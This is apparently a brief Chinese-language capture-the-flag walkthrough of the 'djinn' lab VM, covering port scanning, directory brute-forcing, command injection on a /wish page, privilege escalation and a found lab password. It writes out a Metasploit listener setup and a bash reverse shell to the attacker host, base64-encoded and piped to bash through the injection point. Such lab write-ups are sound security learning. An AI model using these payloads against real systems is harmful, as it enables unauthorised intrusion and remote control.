djinn

靶机准备

将靶机ova文件导入虚拟机，并将网络设置为NAT

开机获得ip:192.168.164.188

kali:192.168.164.137

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.188

开放了4个端口，其中7331运行着http服务，访问

爆下目录

./dirsearch.py -u http://192.168.164.188:7331 -e* -w top.txt

扫到两个目录
浏览器访问http://192.168.164.188:7331/wish，
发现命令注入点

无思路，以下参考wp:
攻击机上设置个监听

msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.164.137
set lport 4444
exploit

准备反弹shell命令

bash -i >& /dev/tcp/192.168.164.137/4444 0>&1

转成base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzcvNDQ0NCAwPiYxCg==

在页面输入框中提交

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NC4xMzcvNDQ0NCAwPiYxCg== | base64 -d | bash

转成交互式shell,查看不是root权限

python -c 'import pty; pty.spawn("/bin/bash")'

在/home/nitish/.dev下发现用户名密码文件

nitish:p4ssw0rdStr3r0n9
切换nitish用户

发现sam用户可以执行/usr/bin/genie，得到sam用户的shell，发现可以用root用户执行/root/lago

切换root，选择2，猜数字，然后输入num，成功拿到权限